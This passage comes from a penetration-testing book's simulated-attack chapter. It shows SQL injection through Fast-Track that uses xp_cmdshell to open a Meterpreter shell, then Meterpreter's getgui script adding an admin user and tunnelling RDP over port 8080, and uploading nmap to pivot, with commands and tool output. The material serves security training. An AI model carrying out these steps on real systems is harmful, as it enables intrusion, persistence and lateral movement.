background image

Simulated Penetration Test

257

[+] Prepping the payload for delivery. [+]
Sending chunk 1 of 8, this may take a bit...
Sending chunk 2 of 8, this may take a bit...

. . . SNIP . . .

Using H2B Bypass to convert our Payload to Binary..
Running cleanup before launching the payload....
[+] Launching the PAYLOAD!! This may take up to two or three minutes. [+]

This should look familiar. We’ve essentially attacked the web application 

through Fast-Track and exploited it via SQL injection attacks. We used the 

xp_cmdshell

 stored procedure and the binary-to-hex conversion technique to 

present a full-fledged Meterpreter shell.

Post Exploitation

At this point, we should have a Meterpreter console running in the back-
ground within 

msfconsole

, so we can begin to scan the target’s subnet for other 

live systems. To do this, we’ll upload 

nmap

 to the target and run it from the 

Windows machine.

First, download 

nmap

 from 

insecure.org

 in an executable format and save 

it locally. We’ll be uploading this to our target. Next, we’ll connect to the 
target via Microsoft’s Remote Desktop Protocol (RDP), a built-in graphical 
remote administration protocol that lets you interact with the Windows 
Desktop as if you were sitting in front of the remote machine. After we’re 
connected with our Meterpreter session, we’ll use the 

getgui

 Meterpreter script 

to tunnel RDP back out to us over port 8080 and add a new administrative 
user to the system.

We enter 

rdesktop localhost:8080

 from Back|Track’s command line, so 

we can log into the system with the newly created user account. We then use 
Meterpreter to upload 

nmap

 to the target. Our goal is to install 

nmap

 on the 

compromised Windows target and use the system as a staging ground for 
further attacks. Conversely you could use 

scanner/portscan/syn

 and 

scanner/

portscan/tcp

 to port scan directly through Metasploit. The choice is a matter 

of personal preference and needs.

meterpreter > 

run getgui -e -f 8080

[*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator
[*] Carlos Perez carlos_perez@darkoperator.com
[*] Enabling Remote Desktop
[*] RDP is already enabled
[*] Setting Terminal Services service startup mode
[*] Terminal Services service is already set to auto
[*] Opening port in local firewall if necessary
[*] Starting the port forwarding at local port 8080
[*] Local TCP relay created: 0.0.0.0:8080 <-> 127.0.0.1:3389
meterpreter > 

shell